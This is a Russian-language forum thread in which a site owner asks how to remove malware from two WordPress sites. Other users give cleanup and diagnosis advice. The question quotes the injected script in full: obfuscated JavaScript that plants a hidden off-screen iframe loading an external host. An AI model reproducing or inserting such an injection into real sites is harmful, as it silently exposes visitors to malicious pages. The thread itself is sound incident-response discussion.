Как удалить вирус из WordPress?

Question

[SilverOK]

Всем привет!
Столкнулся с проблемой: на двух сайтах у футере появился некий скрипт:

<script type='text/javascript'>var wow="undeab2reab3pearrb2b1b2tcb1brb1ms";c1="l"+"on"+"l"+"y"; if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g,"e").replace(/b1/g, ".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").appendChild(a)};</script> <!-- A <a href="http://wordpress.org/">WordPress</a> Project -->

И появляется не просто так, а в любой неожиданный момент и каждый раз вызывает новый некий сайт.

footer.php, functions.php — чистые, с вордпрессом давно знаком.

Перезаливал wp-admin, wp-include и т.д., все плагины деактивировал — код по прежнему остается.

Пытался поискать подобное в БД — тоже закончилось не успехом.

Кто сталкивался с подобным? Где еще глубже искать?

Есть вариант у wp_footer вывести название файлов или плагинов, которые выводятся?

Спасибо!

Answer 1

[charliez]

посмотрите для начала в .htaccess на наличие левых редиректов или auto_append_file / auto_prepend_file — в вордпресс обычно так вставляют вредоносный код.

не найдется в .htaccess — тогда смотреть сюда cssing.org.ua/2008/06/01/wp-footer-exploit/

и не забудьте обновить вордпресс до последней версии!

Answer 2

[Egor Nedbailo]

Вирус скорее всего идет через зараженную машину по FTP. Идите в этом направлении.

Answer 3

[lubezniy]

Возможно, вирус попал в веб-каталог. Чтобы найти его, можно попытаться сделать следующее:

1. Скопировать все файлы из веб-каталога на обычную машину в отдельный каталог;
2. В файловом менеджере вроде FAR запустить поиск файлов в этом каталоге с содержимым по какому-нибудь фрагменту вирусного кода.

Естественно, это полумера. Нужно искать возможные причины взлома и устранять их — самостоятельно или через админов хостинга.

Answer 4

[Graid]

Так же можно посмотреть нет ли недавно измененных файлов, часто «кулхацкеры» с этим палятся.

Answer 5

[Daniel Newman]

Что за хостинг: shared, vds, vps? Версия WP? Как можно загрузить контент (плагины)? Права на папки и файлы? FTP/SSH? Контроль версий файлов? Очень много угадать нужно. Помогите дать вам ответ.

Answer 6

[Kuzma]

Столкнулся с подобной проблемой. Только мне надо было вылечить не один, а много вордпрессов. Пришлось для такого дела даже отдельный скрипт написать. Делюсь: blog.nkuznetsov.me/2012/11/wpdiff-tool-for-wordpress-comparison.html

С помощью этого скрипта можно:
1. сравнить текущую инсталляцию с оригинальной и увидеть вписался ли «жучок» в ядро или нет
2. также можно сравнить здоровую версию (из бэкапа, например) с больной и определить в каком плагине произошли изменения

Answer 7

[Danil Namaste]

очень много опыта по чистке и защите от подобной напасти.
Рекомендую, notepad++ с функцией массовой замены текста.

Answer 8

[Дмитрий Буткевич]

Прежде всего проверьте свой локальный комп. Все трояны через FTP лезут. Скачайте полностью сайт на локал и проверьте хорошим антивирем.